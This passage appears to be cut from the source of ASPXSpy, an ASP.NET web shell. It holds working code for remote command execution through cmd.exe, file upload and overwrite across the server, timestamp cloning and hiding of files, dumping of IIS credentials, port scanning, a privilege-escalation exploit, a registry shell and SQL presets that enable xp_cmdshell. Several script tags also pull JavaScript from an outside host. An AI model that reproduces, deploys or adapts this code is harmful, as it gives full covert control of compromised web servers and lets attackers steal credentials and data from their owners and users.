1842 kbXY[sdO]=new Thread(new ThreadStart(((ScanPort)IVc[sdO]).Scan));
1843 kbXY[sdO].Start();
1844 }
1845 for(sdO=0;sdO<kbXY.Length;sdO++)
1846 kbXY[sdO].Join();
1847 }
1848 catch
1849 {
1850 }
1851 }
1852 public class ScanPort
1853 {
1854 private string _ip="";
1855 private int jTdO=0;
1856 private TimeSpan _timeSpent;
1857 private string QGcH="Not scanned";
1858 public string ip
1859 {
1860 get { return _ip;}
1861 }
1862 public int port
1863 {
1864 get { return jTdO;}
1865 }
1866 public string status
1867 {
1868 get { return QGcH;}
1869 }
1870 public TimeSpan timeSpent
1871 {
1872 get { return _timeSpent;}
1873 }
1874 public ScanPort(string ip,int port)
1875 {
1876 _ip=ip;
1877 jTdO=port;
1878 }
1879 public void Scan()
1880 {
1881 TcpClient iYap=new TcpClient();
1882 DateTime qYZT=DateTime.Now;
1883 try
1884 {
1885 iYap.Connect(_ip,jTdO);
1886 iYap.Close();
1887 QGcH="<font color=green><b>Open</b></font>";
1888 }
1889 catch
1890 {
1891 QGcH="<font color=red><b>Close</b></font>";
1892 }
1893 _timeSpent=DateTime.Now.Subtract(qYZT);
1894 }
1895 }
1896 public static void YFcNP(System.Web.UI.Page page)
1897 {
1898 page.RegisterHiddenField("__EVENTTARGET","");
1899 page.RegisterHiddenField("__FILE","");
1900 string s=@"<script language=Javascript>";
1901 s+=@"function Bin_PostBack(eventTarget,eventArgument)";
1902 s+=@"{";
1903 s+=@"var theform=document.forms[0];";
1904 s+=@"theform.__EVENTTARGET.value=eventTarget;";
1905 s+=@"theform.__FILE.value=eventArgument;";
1906 s+=@"theform.submit();";
1907 s+=@"} ";
1908 s+=@"</scr"+"ipt>";
1909 page.RegisterStartupScript("",s);
1910 }
1911 protected void PPtK(object sender,EventArgs e)
1912 {
1913 WICxe();
1914 yhv.Visible=true;
1915 Bin_H2_Title.InnerText="File Search >>";
1916 NaLJ.Value=Request.PhysicalApplicationPath;
1917 oJiym.Visible=false;
1918 }
1919 protected void NBy(object sender,EventArgs e)
1920 {
1921 DirectoryInfo GQMM=new DirectoryInfo(NaLJ.Value);
1922 if(!GQMM.Exists)
1923 {
1924 xseuB("Path invalid ! ");
1925 return;
1926 }
1927 oog(GQMM);
1928 xseuB("Search completed ! ");
1929 }
1930 public void oog(DirectoryInfo dir)
1931 {
1932 try
1933 {
1934 oJiym.Visible=true;
1935 foreach(FileInfo Bin_Files in dir.GetFiles())
1936 {
1937 try
1938 {
1939 if(Bin_Files.FullName==Request.PhysicalPath)
1940 {
1941 continue;
1942 }
1943 if(!Regex.IsMatch(Bin_Files.Extension.Replace(".",""),"^("+UDLvA.Value+")$",RegexOptions.IgnoreCase))
1944 {
1945 continue;
1946 }
1947 if(Ven.SelectedItem.Value=="name")
1948 {
1949 if(rAQ.Checked)
1950 {
1951 if(Regex.IsMatch(Bin_Files.Name,iaMKl.Value,RegexOptions.IgnoreCase))
1952 {
1953 FJvQ(Bin_Files);
1954 }
1955 }
1956 else
1957 {
1958 if(Bin_Files.Name.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
1959 {
1960 Response.Write(Bin_Files.FullName);
1961 FJvQ(Bin_Files);
1962 }
1963 }
1964 }
1965 else
1966 {
1967 StreamReader sr=new StreamReader(Bin_Files.FullName,Encoding.Default);
1968 string ava=sr.ReadToEnd();
1969 sr.Close();
1970 if(rAQ.Checked)
1971 {
1972 if(Regex.IsMatch(ava,iaMKl.Value,RegexOptions.IgnoreCase))
1973 {
1974 FJvQ(Bin_Files);
1975 if(YZw.Checked)
1976 {
1977 ava=Regex.Replace(ava,iaMKl.Value,qPe.Value,RegexOptions.IgnoreCase);
1978 StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
1979 sw.Write(ava);
1980 sw.Close();
1981 }
1982 }
1983 }
1984 else
1985 {
1986 if(ava.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
1987 {
1988 FJvQ(Bin_Files);
1989 if(YZw.Checked)
1990 {
1991 ava=Strings.Replace(ava,iaMKl.Value,qPe.Value,1,-1,CompareMethod.Text);
1992 StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
1993 sw.Write(ava);
1994 sw.Close();
1995 }
1996 }
1997 }
1998 }
1999 }
2000 catch(Exception ex)
2001 {
2002 xseuB(ex.Message);
2003 continue;
2004 }
2005 }
2006 foreach(DirectoryInfo subdir in dir.GetDirectories())
2007 {
2008 oog(subdir);
2009 }
2010 }
2011 catch(Exception ex)
2012 {
2013 xseuB(ex.Message);
2014 }
2015 }
2016 public void FJvQ(FileInfo objfile)
2017 {
2018 TableRow tr=new TableRow();
2019 TableCell tc=new TableCell();
2020 string bg=OKM();
2021 tr.Attributes["onmouseover"]="this.className='focus';";
2022 tr.CssClass=bg;
2023 tr.Attributes["onmouseout"]="this.className='"+bg+"';";
2024 tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(objfile.DirectoryName)+"')\">"+objfile.FullName+"</a>";
2025 tr.Cells.Add(tc);
2026 tc=new TableCell();
2027 tc.Text=objfile.LastWriteTime.ToString();
2028 tr.Cells.Add(tc);
2029 tc=new TableCell();
2030 tc.Text=mTG(objfile.Length);
2031 tr.Cells.Add(tc);
2032 oJiym.Rows.Add(tr);
2033 }
2034 public void xseuB(string instr)
2035 {
2036 jDKt.Visible=true;
2037 jDKt.InnerText=instr;
2038 }
2039 protected void xVm(object sender,EventArgs e)
2040 {
2041 string Jfm=FormsAuthentication.HashPasswordForStoringInConfigFile(HRJ.Text,"MD5").ToLower();
2042 if(Jfm==Password)
2043 {
2044 Response.Cookies.Add(new HttpCookie(vbhLn,Password));
2045 ljtzC.Visible=false;
2046 PBZw();
2047 }
2048 else
2049 {
2050 tZSx();
2051 }
2052 }
2053 protected void Ybg(object sender,EventArgs e)
2054 {
2055 krIR(Server.MapPath("."));
2056 }
2057 protected void KjPi(object sender,EventArgs e)
2058 {
2059 Bin_H2_Title.InnerText="IIS Spy >>";
2060 WICxe();
2061 VNR.Visible=true;
2062 AdCx();
2063 }
2064 protected void DGCoW(object sender,EventArgs e)
2065 {
2066 try
2067 {
2068 StreamWriter sw;
2069 if(NdCX.SelectedItem.Text=="UTF-8")
2070 {
2071 sw=new StreamWriter(Sqon.Value,false,Encoding.UTF8);
2072 }
2073 else
2074 {
2075 sw=new StreamWriter(Sqon.Value,false,Encoding.Default);
2076 }
2077 sw.Write(Xgvv.InnerText);
2078 sw.Close();
2079 xseuB("Save file success !");
2080 }
2081 catch(Exception error)
2082 {
2083 xseuB(error.Message);
2084 }
2085 krIR(AXSbb.Value);
2086 }
2087 protected void lbjLD(object sender,EventArgs e)
2088 {
2089 string FlwA=AXSbb.Value;
2090 FlwA=OElM(FlwA);
2091 try
2092 {
2093 Fhq.PostedFile.SaveAs(FlwA+Path.GetFileName(Fhq.Value));
2094 xseuB("File upload success!");
2095 }
2096 catch(Exception error)
2097 {
2098 xseuB(error.Message);
2099 }
2100 krIR(AXSbb.Value);
2101 }
2102 protected void EXV(object sender,EventArgs e)
2103 {
2104 krIR(AXSbb.Value);
2105 }
2106 protected void mcCY(object sender,EventArgs e)
2107 {
2108 krIR(Server.MapPath("."));
2109 }
2110 protected void iVk(object sender,CommandEventArgs e)
2111 {
2112 krIR(e.CommandArgument.ToString());
2113 }
2114 protected void XXrLw(object sender,EventArgs e)
2115 {
2116 try
2117 {
2118 File.SetCreationTimeUtc(QiFB.Value,File.GetCreationTimeUtc(lICp.Value));
2119 File.SetLastAccessTimeUtc(QiFB.Value,File.GetLastAccessTimeUtc(lICp.Value));
2120 File.SetLastWriteTimeUtc(QiFB.Value,File.GetLastWriteTimeUtc(lICp.Value));
2121 xseuB("File time clone success!");
2122 }
2123 catch(Exception error)
2124 {
2125 xseuB(error.Message);
2126 }
2127 krIR(AXSbb.Value);
2128 }
2129 protected void tIykC(object sender,EventArgs e)
2130 {
2131 string path=pWVL.Value;
2132 try
2133 {
2134 File.SetAttributes(path,FileAttributes.Normal);
2135 if(ZhWSK.Checked)
2136 {
2137 File.SetAttributes(path,FileAttributes.ReadOnly);
2138 }
2139 if(SsR.Checked)
2140 {
2141 File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.System);
2142 }
2143 if(ccB.Checked)
2144 {
2145 File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Hidden);
2146 }
2147 if(fbyZ.Checked)
2148 {
2149 File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Archive);
2150 }
2151 File.SetCreationTimeUtc(path,Convert.ToDateTime(yUqx.Value));
2152 File.SetLastAccessTimeUtc(path,Convert.ToDateTime(aLsn.Value));
2153 File.SetLastWriteTimeUtc(path,Convert.ToDateTime(uYjw.Value));
2154 xseuB("File attributes modify success!");
2155 }
2156 catch(Exception error)
2157 {
2158 xseuB(error.Message);
2159 }
2160 krIR(AXSbb.Value);
2161 }
2162 protected void VOxn(object sender,EventArgs e)
2163 {
2164 WICxe();
2165 vIac.Visible=true;
2166 Bin_H2_Title.InnerText="Execute Command >>";
2167 }
2168 protected void FbhN(object sender,EventArgs e)
2169 {
2170 try
2171 {
2172 Process ahAE=new Process();
2173 ahAE.StartInfo.FileName=kusi.Value;
2174 ahAE.StartInfo.Arguments=bkcm.Value;
2175 ahAE.StartInfo.UseShellExecute=false;
2176 ahAE.StartInfo.RedirectStandardInput=true;
2177 ahAE.StartInfo.RedirectStandardOutput=true;
2178 ahAE.StartInfo.RedirectStandardError=true;
2179 ahAE.Start();
2180 string Uoc=ahAE.StandardOutput.ReadToEnd();
2181 Uoc=Uoc.Replace("<","&lt;");
2182 Uoc=Uoc.Replace(">","&gt;");
2183 Uoc=Uoc.Replace("\r\n","<br>");
2184 tnQRF.Visible=true;
2185 tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";
2186 }
2187 catch(Exception error)
2188 {
2189 xseuB(error.Message);
2190 }
2191 }
2192 protected void RAFL(object sender,EventArgs e)
2193 {
2194 if(qPdI.Text.Length>0)
2195 {
2196 tpRQ(qPdI.Text);
2197 }
2198 else
2199 {
2200 lFAvw();
2201 }
2202 }
2203 protected void Grxk(object sender,EventArgs e)
2204 {
2205 YUw();
2206 }
2207 protected void ilC(object sender,EventArgs e)
2208 {
2209 tZRH();
2210 }
2211 protected void HtB(object sender,EventArgs e)
2212 {
2213 pDVM();
2214 }
2215 protected void Olm(object sender,EventArgs e)
2216 {
2217 iLVUT();
2218 }
2219 protected void jXhS(object sender,EventArgs e)
2220 {
2221 ADCpk();
2222 }
2223 protected void lRfRj(object sender,EventArgs e)
2224 {
2225 lDODR();
2226 }
2227 protected void xSy(object sender,EventArgs e)
2228 {
2229 xFhz();
2230 }
2231 protected void dMx(object sender,EventArgs e)
2232 {
2233 rAhe();
2234 }
2235 protected void zOVO(object sender,EventArgs e)
2236 {
2237 if(((DropDownList)sender).ID.ToString()=="WYmo")
2238 {
2239 dQIIF.Visible=false;
2240 MasR.Text=WYmo.SelectedItem.Value.ToString();
2241 }
2242 if(((DropDownList)sender).ID.ToString()=="Pvf")
2243 {
2244 xTZY();
2245 }
2246 if(((DropDownList)sender).ID.ToString()=="FGEy")
2247 {
2248 jHIy.InnerText=FGEy.SelectedItem.Value.ToString();
2249 }
2250 if(((DropDownList)sender).ID.ToString()=="NdCX")
2251 {
2252 gLKc(Sqon.Value);
2253 }
2254 }
2255 protected void IkkO(object sender,EventArgs e)
2256 {
2257 krIR(AXSbb.Value);
2258 }
2259 protected void BGY(object sender,EventArgs e)
2260 {
2261 vCf();
2262 }
2263 protected void cptS(object sender,EventArgs e)
2264 {
2265 vNCHZ();
2266 }
2267 protected void fDO(object sender,EventArgs e)
2268 {
2269 MHLv();
2270 }
2271 protected void vJNsE(object sender,EventArgs e)
2272 {
2273 vuou();
2274 xseuB("Clear All Thread ......");
2275 }
2276 protected void wDZ(object sender,EventArgs e)
2277 {
2278 if(iXdh.Value=="" || eEpm.Value.Length<7 || ZHS.Value=="")return;
2279 ruQO();
2280 xseuB("All Thread Start ......");
2281 }
2282 protected void tYoZ(object sender,EventArgs e)
2283 {
2284 }
2285 protected void ELkQ(object sender,EventArgs e)
2286 {
2287 VikG();
2288 GBYT.Visible=true;
2289 string res=string.Empty;
2290 foreach(ScanPort th in IVc)
2291 {
2292 res+=th.ip+" : "+th.port+" ................................. "+th.status+"<br>";
2293 }
2294 GBYT.InnerHtml=res;
2295 }
2296 protected void ORUgV(object sender,EventArgs e)
2297 {
2298 dwgT();
2299 }
2300 public void WICxe()
2301 {
2302 DCbS.Visible=false;
2303 CzfO.Visible=false;
2304 APl.Visible=false;
2305 vIac.Visible=false;
2306 kkHN.Visible=false;
2307 YwLB.Visible=false;
2308 iDgmL.Visible=false;
2309 hOWTm.Visible=false;
2310 vrFA.Visible=false;
2311 yhv.Visible=false;
2312 }
2313 </script>
2314 <html xmlns="http://www.w3.org/1999/xhtml" >
2315 <SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
2316 <head id="Head1" runat="server">
2317 <SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
2318 <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
2319 <title>ASPXspy</title>
2320 <SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
2321 <style type="text/css">
2322 .Bin_Style_Login{font:11px Verdana;BACKGROUND: #FFFFFF;border: 1px solid #666666;}
2323 body,td{font: 12px Arial,Tahoma;line-height: 16px;}
2324 .input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:16px;}
2325 .list{font:12px Arial,Tahoma;height:23px;}
2326 .area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}
2327 .bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
2328 a {color: #00f;text-decoration:underline;}
2329 a:hover{color: #f00;text-decoration:none;}
2330 .alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:5px 10px 5px 5px;}
2331 .alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:5px 10px 5px 5px;}
2332 .focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
2333 .head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#e8e8e8;padding:5px 10px 5px 5px;font-weight:bold;}
2334 .head td span{font-weight:normal;}
2335 form{margin:0;padding:0;}
2336 h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
2337 ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
2338 u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
2339 .u1{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
2340 .u2{text-decoration: none;color:#777;float:left;display:block;width:350px;margin-right:10px;}
2341 </style>
2342 <script type="text/javascript">
2343 function CheckAll(form){
2344 for(var i=0;i<form.elements.length;i++){
2345 var e=form.elements[i];
2346 if(e.name!='chkall')
2347 e.checked=form.chkall.checked;
2348 }
2349 }
2350 </script>
2351 </head>
2352 <body style="margin:0;table-layout:fixed;">
2353 <form id="ASPXSpy" runat="server">
2354 <div id="ljtzC" runat="server" style=" margin:15px" enableviewstate="false" visible="false" >
2355 <span style="font:11px Verdana;">Password:</span>
2356 <asp:TextBox ID="HRJ" runat="server" Columns="20" CssClass="Bin_Style_Login" ></asp:TextBox>
2357 <asp:Button ID="ZSnXu" runat="server" Text="Login" CssClass="Bin_Style_Login" OnClick="xVm"/><p/>
2358 Copyright &copy; 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_blank">www.rootkit.net.cn</a>
2359 </div>
2360 <div id="ZVS" runat="server">
2361 <div id="Zzj" runat="server">
2362 <table width="100%" border="0" cellpadding="0" cellspacing="0">
2363 <tr class="head">
2364 <td ><span style="float:right;"><a href="http://www.rootkit.net.cn" target="_blank">ASPXSpy Ver: 2009</a></span><span id="Bin_Span_Sname" runat="server" enableviewstate="true"></span></td>
2365 </tr>
2366 <tr class="alt1">
2367 <td><span style="float:right;" id="Bin_Span_FrameVersion" runat="server"></span>
2368 <asp:LinkButton ID="UtkN" runat="server" OnClick="YKpI" Text="Logout" ></asp:LinkButton> | <asp:LinkButton ID="RsqhW" runat="server" Text="File Manager" OnClick="Ybg"></asp:LinkButton> | <asp:LinkButton ID="xxzE" runat="server" Text="CmdShell" OnClick="VOxn"></asp:LinkButton> | <asp:LinkButton ID="nuc" runat="server" Text="IIS Spy" OnClick="KjPi"></asp:LinkButton> | <asp:LinkButton ID="OREpx" runat="server" Text="Process" OnClick="Grxk"></asp:LinkButton> | <asp:LinkButton ID="jHN" runat="server" Text="Services" OnClick="ilC"></asp:LinkButton> | <asp:LinkButton ID="PHq" runat="server" Text="UserInfo" OnClick="Olm"></asp:LinkButton> | <asp:LinkButton ID="wmgnK" runat="server" Text="SysInfo" OnClick="HtB"></asp:LinkButton> | <asp:LinkButton ID="FeV" runat="server" Text="FileSearch" OnClick="PPtK"></asp:LinkButton> | <asp:LinkButton ID="PVQ" runat="server" Text="SU Exp" OnClick="jXhS"></asp:LinkButton> | <asp:LinkButton ID="jNDb" runat="server" Text="RegShell" OnClick="xSy"></asp:LinkButton> | <asp:LinkButton ID="HDQ" runat="server" Text="PortScan" OnClick="cptS" ></asp:LinkButton> | <asp:LinkButton ID="AoI" runat="server" Text="DataBase" OnClick="dMx"></asp:LinkButton> | <asp:LinkButton ID="KHbEd" runat="server" Text="PortMap" OnClick="fDO"></asp:LinkButton>
2369 </td>
2370 </tr>
2371 </table>
2372 </div>
2373 <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
2374 <div id="jDKt" style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;" runat="server" visible="false" enableviewstate="false"></div>
2375 <h2 id="Bin_H2_Title" runat="server"></h2>
2376 <%--FileList--%>
2377 <div id="CzfO" runat="server">
2378 <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
2379  <tr>
2380 <td style=" white-space:nowrap">Current Directory : </td>
2381 <td style=" width:100%"><input class="input" id="AXSbb" type="text" style="width:97%;margin:0 8px;" runat="server"/>
2382 </td>
2383 <td style="white-space:nowrap" ><asp:Button ID="xaGwl" runat="server" Text="Go" CssClass="bt" OnClick="EXV"/></td>
2384  </tr>
2385 </table>
2386 <table width="100%" border="0" cellpadding="4" cellspacing="0">
2387 <tr class="alt1"><td colspan="7" style="padding:5px;">
2388 <div style="float:right;"><input id="Fhq" class="input" runat="server" type="file" style=" height:22px"/>
2389 <asp:Button ID="RvPp" CssClass="bt" runat="server" Text="Upload" OnClick="lbjLD"/></div><asp:LinkButton ID="OLJFp" runat="server" Text="WebRoot" OnClick="mcCY"></asp:LinkButton> | <a href="#" id="Bin_Button_CreateDir" runat="server">Create Directory</a> | <a href="#" id="Bin_Button_CreateFile" runat="server">Create File</a>
2390  | <span id="Bin_Span_Drv" runat="server"></span><a href="#" id="Bin_Button_KillMe" runat="server" style="color:Red">Kill Me</a>
2391 </td></tr>
2392 <asp:Table ID="UGzP" runat="server" Width="100%" CellSpacing="0" >
2393 <asp:TableRow CssClass="head"><asp:TableCell>&nbsp;</asp:TableCell><asp:TableCell>Filename</asp:TableCell><asp:TableCell Width="25%">Last modified</asp:TableCell><asp:TableCell Width="15%">Size</asp:TableCell><asp:TableCell Width="25%">Action</asp:TableCell></asp:TableRow>
2394 </asp:Table>
2395 </table>
2396 </div>
2397 <%--FileEdit--%>
2398 <div id="vrFA" runat="server">
2399 <p>Current File(import new file name and new file)<br/>
2400 <input class="input" id="Sqon" type="text" size="100" runat="server"/> <asp:DropDownList ID="NdCX" runat="server" CssClass="list" AutoPostBack="true" OnSelectedIndexChanged="zOVO"><asp:ListItem>Default</asp:ListItem><asp:ListItem>UTF-8</asp:ListItem></asp:DropDownList>
2401 </p>
2402 <p>File Content<br/>
2403 <textarea id="Xgvv" runat="server" class="area" cols="100" rows="25" enableviewstate="true" ></textarea>
2404 </p>
2405 <p><asp:Button ID="JJjbW" runat="server" Text="Submit" CssClass="bt" OnClick="DGCoW"/> <asp:Button ID="iCNu" runat="server" Text="Back" CssClass="bt" OnClick="IkkO"/></p>
2406 </div>
2407 <%--CloneTime--%>
2408 <div id="zRyG" runat="server" enableviewstate="false" visible="false">
2409 <p>Alter file<br/><input class="input" id="QiFB" type="text" size="120" runat="server"/></p>
2410 <p>Reference file(fullpath)<br/><input class="input" id="lICp" type="text" size="120" runat="server"/></p>
2411 <p><asp:Button ID="JEaxV" runat="server" Text="Submit" CssClass="bt" OnClick="XXrLw"/></p>
2412 <h2>Set last modified &raquo;</h2>
2413 <p>Current file(fullpath)<br/><input class="input" id="pWVL" type="text" size="120" runat="server"/></p>
2414 <p>
2415 <asp:CheckBox ID="ZhWSK" runat="server" Text="ReadOnly" EnableViewState="False"/>
2416 &nbsp;
2417 <asp:CheckBox ID="SsR" runat="server" Text="System" EnableViewState="False"/>
2418 &nbsp;
2419 <asp:CheckBox ID="ccB" runat="server" Text="Hidden" EnableViewState="False"/>
2420 &nbsp;
2421 <asp:CheckBox ID="fbyZ" runat="server" Text="Archive" EnableViewState="False"/>
2422 </p>
2423 <p>
2424 CreationTime :
2425 <input class="input" id="yUqx" type="text" runat="server"/>
2426 LastWriteTime :
2427 <input class="input" id="uYjw" type="text" runat="server"/>
2428 LastAccessTime :
2429 <input class="input" id="aLsn" type="text" runat="server"/>
2430 </p>
2431 <p>
2432 <asp:Button ID="kOG" CssClass="bt" runat="server" Text="Submit" OnClick="tIykC"/>
2433 </p>
2434 </div>
2435 <%--IISSpy--%>
2436 <div runat="server" id="VNR" visible="false" enableviewstate="false">
2437 <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2438 <asp:Table ID="GlI" runat="server" Width="100%" CellSpacing="0">
2439 <asp:TableRow CssClass="head"><asp:TableCell>ID</asp:TableCell><asp:TableCell>IIS_USER</asp:TableCell><asp:TableCell>IIS_PASS</asp:TableCell><asp:TableCell>Domain</asp:TableCell><asp:TableCell>Path</asp:TableCell></asp:TableRow>
2440 </asp:Table>
2441 </table>
2442 </div>
2443 <%--Process--%>
2444 <div runat="server" id="DCbS" visible="false" enableviewstate="false">
2445 <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2446 <asp:Table ID="IjsL" runat="server" Width="100%" CellSpacing="0" >
2447 <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Process</asp:TableCell><asp:TableCell>ThreadCount</asp:TableCell><asp:TableCell>Priority</asp:TableCell><asp:TableCell>Action</asp:TableCell></asp:TableRow>
2448 </asp:Table>
2449 </table>
2450 </div>
2451 <%--CmdShell--%>
2452 <div runat="server" id="vIac">
2453  <p>CmdPath:<br/>
2454  <input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
2455  </p>
2456  Argument:<br/>
2457  <input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/>
2458  <div id="tnQRF" runat="server" visible="false" enableviewstate="false">
2459  </div>
2460 </div>
2461 <%--Services--%>
2462 <div runat="server" id="iQxm" visible ="false" enableviewstate="false">
2463 <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2464 <asp:Table ID="vHCs" runat="server" Width="100%" CellSpacing="0" >
2465 <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Name</asp:TableCell><asp:TableCell>Path</asp:TableCell><asp:TableCell>State</asp:TableCell><asp:TableCell>StartMode</asp:TableCell></asp:TableRow>
2466 </asp:Table>
2467 </table>
2468 </div>
2469 <%--Sysinfo--%>
2470 <div runat="server" id="ghaB" visible="false" enableviewstate="false">
2471 <hr style=" border: 1px solid #ddd;height:0px;"/>
2472 <ul class="info" id="Bin_Ul_Sys" runat="server"></ul>
2473 <h2 id="Bin_H2_Mac" runat="server"></h2>
2474 <hr style=" border: 1px solid #ddd;height:0px;"/>
2475 <ul class="info" id ="Bin_Ul_NetConfig" runat="server"></ul>
2476 <h2 id="Bin_H2_Driver" runat="server"></h2>
2477 <hr style=" border: 1px solid #ddd;height:0px;"/>
2478 <ul class="info" id ="Bin_Ul_Driver" runat="server"></ul>
2479 </div>
2480 <%--UserInfo--%>
2481 <div runat="server" id="xWVQ" visible="false" enableviewstate="false">
2482 <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2483 <asp:Table ID="VPa" runat="server" Width="100%" CellSpacing="0" >
2484 </asp:Table>
2485 </table>
2486 </div>
2487 <%--SuExp--%>
2488  <div runat="server" id="APl">
2489 <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2490  <tr align="center">
2491  <td style="width:10%"></td>
2492  <td style="width:20%" align="left">UserName : <input class="input" runat="server" id="dNohJ" type="text" size="20" value="localadministrator"/></td>
2493  <td style="width:20%" align="left">PassWord : <input class="input" runat="server" id="NMd" type="text" size="20" value="#l@$ak#.lk;0@P"/></td>
2494  <td style="width:20%" align="left">Port : <input class="input" runat="server" id="HlQl" type="text" size="20" value="43958"/></td>
2495  <td style="width:10%"></td>
2496  </tr>
2497  <tr >
2498  <td style="width:10%"></td>
2499  <td colspan="5">CmdShell&nbsp;&nbsp;:&nbsp;<input class="input" runat="server" id="mHbjB" type="text" size="100" value="cmd.exe /c net user"/> <asp:Button ID="SPhc" CssClass="bt" runat="server" Text="Exploit" OnClick="lRfRj"/></td>
2500  </tr>
2501 </table>
2502 <div id="UHlA" visible="false" enableviewstate="false" runat="server">
2503 <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2504 <tr align="center">
2505 <td style="width:30%"></td>
2506 <td align="left" style="width:40%"><pre id="Bin_Td_Res" runat="server"></pre></td>
2507 <td style="width:30%"></td>
2508 </tr>
2509 </table>
2510 </div>
2511 </div>
2512 <%--Reg--%>
2513 <div id="kkHN" runat="server">
2514 <p>Registry Path : <asp:TextBox id="qPdI" style="width:85%;margin:0 8px;" CssClass="input" runat="server"/><asp:Button ID="MoNA" runat="server" Text="Go" CssClass="bt" onclick="RAFL"/></p>
2515 <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
2516 <asp:Table ID="pLWD" runat="server" Width="100%" CellSpacing="0" >
2517 <asp:TableRow CssClass="alt1"><asp:TableCell ColumnSpan="2" id="vyX"></asp:TableCell></asp:TableRow>
2518 <asp:TableRow CssClass="head"><asp:TableCell Width="40%">Key</asp:TableCell><asp:TableCell Width="60%">Value</asp:TableCell></asp:TableRow>
2519 </asp:Table>
2520 </table>
2521 </div>
2522 <%--PortScan--%>
2523 <div id="YwLB" runat="server">
2524 <p>
2525 IP : <asp:TextBox id="MdR" style="width:10%;margin:0 8px;" CssClass="input" runat="server" Text="127.0.0.1"/> Port : <asp:TextBox id="lOmX" style="width:40%;margin:0 8px;" CssClass="input" runat="server" Text="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"/> <asp:Button ID="CmUCh" runat="server" Text="Scan" CssClass="bt" OnClick="ELkQ"/>
2526 </p>
2527 <div id="GBYT" runat="server" visible="false" enableviewstate="false"></div>
2528 </div>
2529 <%--DataBase--%>
2530 <div id="iDgmL" runat="server">
2531 <p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssClass="input" runat="server"/><asp:DropDownList runat="server" CssClass="list" ID="WYmo" AutoPostBack="True" OnSelectedIndexChanged="zOVO" ><asp:ListItem></asp:ListItem><asp:ListItem Value="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB">MSSQL</asp:ListItem><asp:ListItem Value="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\database.mdb">ACCESS</asp:ListItem></asp:DropDownList><asp:Button ID="QcZPA" runat="server" Text="Go" CssClass="bt" OnClick="BGY"/></p>
2532 <div id="dQIIF" runat="server">
2533 <div id="irTU" runat="server"></div>
2534 <div id="uXevN" runat="server">
2535 Please select a database : <asp:DropDownList runat="server" ID="Pvf" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"></asp:DropDownList>
2536 SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"><asp:ListItem Value="">-- SQL Server Exec --</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')">Add xp_cmdshell</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('sp_OACreate','odsole70.dll')">Add sp_oacreate</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;">Add xp_cmdshell(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;">Add sp_oacreate(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;">Add makewebtask(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;">Add openrowset/opendatasource(SQL2005)</asp:ListItem><asp:ListItem Value="Exec master.dbo.xp_cmdshell 'net user'">XP_cmdshell 